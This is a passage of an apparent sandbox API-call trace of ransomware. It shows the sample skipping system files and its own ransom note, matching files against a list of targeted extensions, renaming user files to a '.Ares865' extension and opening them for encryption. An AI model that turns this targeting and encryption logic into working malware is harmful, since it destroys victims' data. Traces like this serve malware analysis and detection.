data\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.ares865"), dwFlags=0x1) returned 1 [0106.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=138459) returned 1 [0106.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.392] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21fe0, lpName=0x0) returned 0x124 [0106.394] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21fe0) returned 0x420000 [0106.506] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0106.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0106.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.509] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0106.510] CloseHandle (hObject=0x124) returned 1 [0106.510] CloseHandle (hObject=0x118) returned 1 [0106.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.511] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x4ff30900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ff30900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="aoldtz.exe") returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="windows") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="bootmgr") returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="temp") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="pagefile.sys") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="boot") returned 1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="ids.txt") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="ntuser.dat") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="perflogs") returned -1 [0106.511] lstrcmpiW (lpString1="Cache", lpString2="MSBuild") returned -1 [0106.511] lstrlenW (lpString="Cache") returned 5 [0106.511] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 234 [0106.511] lstrcpyW (in: lpString1=0x2cce5b2, lpString2="Cache" | out: lpString1="Cache") returned="Cache" [0106.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0106.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1be) returned 0x328fc8 [0106.512] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0106.512] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4fee4640, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.512] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.512] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="aoldtz.exe") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2=".") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="..") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="windows") returned -1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="bootmgr") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="temp") returned -1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="pagefile.sys") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="boot") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="ids.txt") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="ntuser.dat") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="perflogs") returned 1 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2="MSBuild") returned 1 [0106.512] lstrlenW (lpString="SharedDataEvents") returned 16 [0106.512] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 222 [0106.512] lstrcpyW (in: lpString1=0x2cce5b2, lpString2="SharedDataEvents" | out: lpString1="SharedDataEvents") returned="SharedDataEvents" [0106.512] lstrlenW (lpString="SharedDataEvents") returned 16 [0106.512] lstrlenW (lpString="Ares865") returned 7 [0106.512] lstrcmpiW (lpString1="aEvents", lpString2="Ares865") returned -1 [0106.512] lstrlenW (lpString=".dll") returned 4 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2=".dll") returned 1 [0106.512] lstrlenW (lpString=".lnk") returned 4 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2=".lnk") returned 1 [0106.512] lstrlenW (lpString=".ini") returned 4 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2=".ini") returned 1 [0106.512] lstrlenW (lpString=".sys") returned 4 [0106.512] lstrcmpiW (lpString1="SharedDataEvents", lpString2=".sys") returned 1 [0106.512] lstrlenW (lpString="SharedDataEvents") returned 16 [0106.512] lstrlenW (lpString="bak") returned 3 [0106.512] lstrcmpiW (lpString1="nts", lpString2="bak") returned 1 [0106.513] lstrlenW (lpString="ba_") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="ba_") returned 1 [0106.513] lstrlenW (lpString="dbb") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="dbb") returned 1 [0106.513] lstrlenW (lpString="vmdk") returned 4 [0106.513] lstrcmpiW (lpString1="ents", lpString2="vmdk") returned -1 [0106.513] lstrlenW (lpString="rar") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="rar") returned -1 [0106.513] lstrlenW (lpString="zip") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="zip") returned -1 [0106.513] lstrlenW (lpString="tgz") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="tgz") returned -1 [0106.513] lstrlenW (lpString="vbox") returned 4 [0106.513] lstrcmpiW (lpString1="ents", lpString2="vbox") returned -1 [0106.513] lstrlenW (lpString="vdi") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="vdi") returned -1 [0106.513] lstrlenW (lpString="vhd") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="vhd") returned -1 [0106.513] lstrlenW (lpString="vhdx") returned 4 [0106.513] lstrcmpiW (lpString1="ents", lpString2="vhdx") returned -1 [0106.513] lstrlenW (lpString="avhd") returned 4 [0106.513] lstrcmpiW (lpString1="ents", lpString2="avhd") returned 1 [0106.513] lstrlenW (lpString="db") returned 2 [0106.513] lstrcmpiW (lpString1="ts", lpString2="db") returned 1 [0106.513] lstrlenW (lpString="db2") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="db2") returned 1 [0106.513] lstrlenW (lpString="db3") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="db3") returned 1 [0106.513] lstrlenW (lpString="dbf") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="dbf") returned 1 [0106.513] lstrlenW (lpString="mdf") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="mdf") returned 1 [0106.513] lstrlenW (lpString="mdb") returned 3 [0106.513] lstrcmpiW (lpString1="nts", lpString2="mdb") returned 1 [0106.513] lstrlenW (lpString="sql") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="sql") returned -1 [0106.514] lstrlenW (lpString="sqlite") returned 6 [0106.514] lstrcmpiW (lpString1="Events", lpString2="sqlite") returned -1 [0106.514] lstrlenW (lpString="sqlite3") returned 7 [0106.514] lstrcmpiW (lpString1="aEvents", lpString2="sqlite3") returned -1 [0106.514] lstrlenW (lpString="sqlitedb") returned 8 [0106.514] lstrcmpiW (lpString1="taEvents", lpString2="sqlitedb") returned 1 [0106.514] lstrlenW (lpString="xml") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="xml") returned -1 [0106.514] lstrlenW (lpString="$er") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="$er") returned 1 [0106.514] lstrlenW (lpString="4dd") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="4dd") returned 1 [0106.514] lstrlenW (lpString="4dl") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="4dl") returned 1 [0106.514] lstrlenW (lpString="^^^") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="^^^") returned 1 [0106.514] lstrlenW (lpString="abs") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="abs") returned 1 [0106.514] lstrlenW (lpString="abx") returned 3 [0106.514] lstrcmpiW (lpString1="nts", lpString2="abx") returned 1 [0106.514] lstrlenW (lpString="accdb") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accdb") returned 1 [0106.514] lstrlenW (lpString="accdc") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accdc") returned 1 [0106.514] lstrlenW (lpString="accde") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accde") returned 1 [0106.514] lstrlenW (lpString="accdr") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accdr") returned 1 [0106.514] lstrlenW (lpString="accdt") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accdt") returned 1 [0106.514] lstrlenW (lpString="accdw") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accdw") returned 1 [0106.514] lstrlenW (lpString="accft") returned 5 [0106.514] lstrcmpiW (lpString1="vents", lpString2="accft") returned 1 [0106.515] lstrlenW (lpString="adb") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="adb") returned 1 [0106.515] lstrlenW (lpString="adb") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="adb") returned 1 [0106.515] lstrlenW (lpString="ade") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="ade") returned 1 [0106.515] lstrlenW (lpString="adf") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="adf") returned 1 [0106.515] lstrlenW (lpString="adn") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="adn") returned 1 [0106.515] lstrlenW (lpString="adp") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="adp") returned 1 [0106.515] lstrlenW (lpString="alf") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="alf") returned 1 [0106.515] lstrlenW (lpString="ask") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="ask") returned 1 [0106.515] lstrlenW (lpString="btr") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="btr") returned 1 [0106.515] lstrlenW (lpString="cat") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="cat") returned 1 [0106.515] lstrlenW (lpString="cdb") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="cdb") returned 1 [0106.515] lstrlenW (lpString="ckp") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="ckp") returned 1 [0106.515] lstrlenW (lpString="cma") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="cma") returned 1 [0106.515] lstrlenW (lpString="cpd") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="cpd") returned 1 [0106.515] lstrlenW (lpString="dacpac") returned 6 [0106.515] lstrcmpiW (lpString1="Events", lpString2="dacpac") returned 1 [0106.515] lstrlenW (lpString="dad") returned 3 [0106.515] lstrcmpiW (lpString1="nts", lpString2="dad") returned 1 [0106.515] lstrlenW (lpString="dadiagrams") returned 10 [0106.515] lstrcmpiW (lpString1="DataEvents", lpString2="dadiagrams") returned 1 [0106.515] lstrlenW (lpString="daschema") returned 8 [0106.515] lstrcmpiW (lpString1="taEvents", lpString2="daschema") returned 1 [0106.516] lstrlenW (lpString="db-journal") returned 10 [0106.516] lstrcmpiW (lpString1="DataEvents", lpString2="db-journal") returned -1 [0106.516] lstrlenW (lpString="db-shm") returned 6 [0106.516] lstrcmpiW (lpString1="Events", lpString2="db-shm") returned 1 [0106.516] lstrlenW (lpString="db-wal") returned 6 [0106.516] lstrcmpiW (lpString1="Events", lpString2="db-wal") returned 1 [0106.516] lstrlenW (lpString="dbc") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dbc") returned 1 [0106.516] lstrlenW (lpString="dbs") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dbs") returned 1 [0106.516] lstrlenW (lpString="dbt") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dbt") returned 1 [0106.516] lstrlenW (lpString="dbv") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dbv") returned 1 [0106.516] lstrlenW (lpString="dbx") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dbx") returned 1 [0106.516] lstrlenW (lpString="dcb") returned 3 [0106.516] lstrcmpiW (lpString1="nts", lpString2="dcb") returned 1 [0106.517] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\SharedDataEvents.Ares865") returned 241 [0106.517] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\shareddataevents"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\SharedDataEvents.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\shareddataevents.ares865"), dwFlags=0x1) returned 1 [0106.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\SharedDataEvents.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\shareddataevents.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.523] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0106.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.524] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.525] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1700, lpName=0x0) returned 0x124 [0106.537] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1700) returned 0x190000 [0106.539] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.539] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.539] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.540] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.540] CloseHandle (hObject=0x124) returned 1 [0106.540] CloseHandle (hObject=0x118) returned 1 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.540] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="aoldtz.exe") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2=".") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="..") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="windows") returned -1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="bootmgr") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="temp") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="pagefile.sys") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="boot") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="ids.txt") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="ntuser.dat") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="perflogs") returned 1 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2="MSBuild") returned 1 [0106.541] lstrlenW (lpString="UserCache.bin") returned 13 [0106.541] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 233 [0106.541] lstrcpyW (in: lpString1=0x2cce5b2, lpString2="UserCache.bin" | out: lpString1="UserCache.bin") returned="UserCache.bin" [0106.541] lstrlenW (lpString="UserCache.bin") returned 13 [0106.541] lstrlenW (lpString="Ares865") returned 7 [0106.541] lstrcmpiW (lpString1="che.bin", lpString2="Ares865") returned 1 [0106.541] lstrlenW (lpString=".dll") returned 4 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2=".dll") returned 1 [0106.541] lstrlenW (lpString=".lnk") returned 4 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2=".lnk") returned 1 [0106.541] lstrlenW (lpString=".ini") returned 4 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2=".ini") returned 1 [0106.541] lstrlenW (lpString=".sys") returned 4 [0106.541] lstrcmpiW (lpString1="UserCache.bin", lpString2=".sys") returned 1 [0106.541] lstrlenW (lpString="UserCache.bin") returned 13 [0106.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\UserCache.bin.Ares865") returned 238 [0106.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\usercache.bin"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\UserCache.bin.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\usercache.bin.ares865"), dwFlags=0x1) returned 1 [0106.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\UserCache.bin.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\usercache.bin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.544] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77477) returned 1 [0106.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.545] CryptAcquireContextW (in: phProv=0x2ccce54, 